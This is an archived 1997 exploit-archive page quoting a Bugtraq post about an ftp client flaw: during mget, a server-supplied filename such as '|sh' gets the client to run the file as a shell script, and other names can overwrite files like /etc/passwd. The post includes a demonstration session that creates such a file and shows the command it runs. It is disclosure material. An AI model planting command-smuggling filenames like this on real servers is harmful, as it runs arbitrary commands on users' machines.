ftp mget vulnerability

Summary
Description:If the nlist caused by a mget returns a file like /etc/passwd , most ftp clients seem to (try to) overwrite/create it without signaling anything wrong. You can also use files with names like "|sh" to execute arbitrary commands.
Author:I don't recall who found it first, in the appended post af@c4c.com gives an example of the bug using Linus slackware
Compromise:ftp servers can compromise clients who use mget to d/l files
Vulnerable Systems:ftp clients on Linux, AIX, HP/UX, Solaris 2.6, and probably many other systems
Date:3 November 1997 was when this example was posted (the bug was found a while back)
Details


Date: Mon, 3 Nov 1997 10:03:52 -0700
From: af@C4C.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client              interprets server provided filenames

> ers@VNET.IBM.COM wrote:
> > VULNERABILITY:    The AIX ftp client interprets server provided
> > filenames
> > I.  Description
> > The ftp client can be tricked into running arbitrary commands supplied
> > by the
> > remote server.  When the remote file begins with a pipe symbol, the
> > ftp client
> > will process the contents of the remote file as a shell script.
>
> On two machines running AIX 3.2.5 I've tested it, but instead of
> executing the remote file, it searches for a local file with the same
> name as the remote file and executes it with normal user priviledges
> instead of root privilegdes.

Yes, but try "|sh" instead.  I've included a log of what happens.
> BTW, I believe that this also happens on HP-UX 9.05

It works on our Linux slackware as well.  I suspect most ftp
clients are susceptible to this "problem."

$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x   2 guest    usr          512 Nov  3 09:45 .
drwxrwxrwt   6 bin      bin         1024 Nov  3 09:44 ..
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r--   1 guest    usr           14 Nov  3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r--   1 guest    usr           28 Nov  3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$

I also wonder about IBM's answer:

SOLUTION:         Remove the setuid bit from the "ftp" command.

On our 4.2.1, ftp will not run if it is not suid.
Didn't somebody test this?

Andrew Green
af@c4c.com

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: